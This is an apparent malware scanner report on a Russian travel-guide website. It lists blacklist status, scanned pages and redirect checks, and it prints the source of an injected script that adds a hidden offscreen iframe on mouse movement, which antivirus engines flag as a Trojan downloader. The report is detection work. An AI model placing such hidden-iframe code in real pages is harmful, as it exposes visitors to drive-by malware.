New scan:

Malware Scanner report for shvetsiya-gid.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "shvetsiya-gid.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=shvetsiya-gid.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shvetsiya-gid.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://shvetsiya-gid.ru/
200 OK
Content-Length: 9616
Content-Type: text/html
clean
http://changeip.changeip.name/rsize.js
200 OK
Content-Length: 405
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

res='Ошибка MySQL';
var astatf = 0;
document.write("<head></head><b><div id='staticaccoin'></div></b>");
document.onmousemove=moveonlinetest;
function moveonlinetest()
{
if (astatf == 0) {
astatf++;
text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>";
document.getElementById("staticaccoin").innerHTML = text
}}

Antivirus reports:

Rising
JS:Malware.HiddenFrame!1.9BFB
Comodo
TrojWare.JS.iFrame.DEE
Kaspersky
Trojan-Downloader.JS.Iframe.dee
Fortinet
HTML/IFrame.HF!tr
NANO-Antivirus
Trojan.Script.Iframe.cktapo
ESET-NOD32
JS/Iframe.HF

http://shvetsiya-gid.ru/imdex.html
404 Not Found
Content-Length: 1148
Content-Type: text/html
clean
http://shvetsiya-gid.ru/test404page.js
404 Not Found
Content-Length: 1148
Content-Type: text/html
clean
http://shvetsiya-gid.ru/romantik_hotel.php
200 OK
Content-Length: 13831
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel1.php
200 OK
Content-Length: 10420
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel2.php
200 OK
Content-Length: 10366
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel3.php
200 OK
Content-Length: 23843
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel4.php
200 OK
Content-Length: 23655
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel5.php
200 OK
Content-Length: 18398
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel6.php
200 OK
Content-Length: 7163
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel7.php
200 OK
Content-Length: 11057
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel8.php
200 OK
Content-Length: 12637
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel9.php
200 OK
Content-Length: 24090
Content-Type: text/html
clean
http://shvetsiya-gid.ru/top_hotel10.php
200 OK
Content-Length: 14589
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: shvetsiya-gid.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 23:28:29 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: shvetsiya-gid.ru
Referer: http://www.google.com/search?q=shvetsiya-gid.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.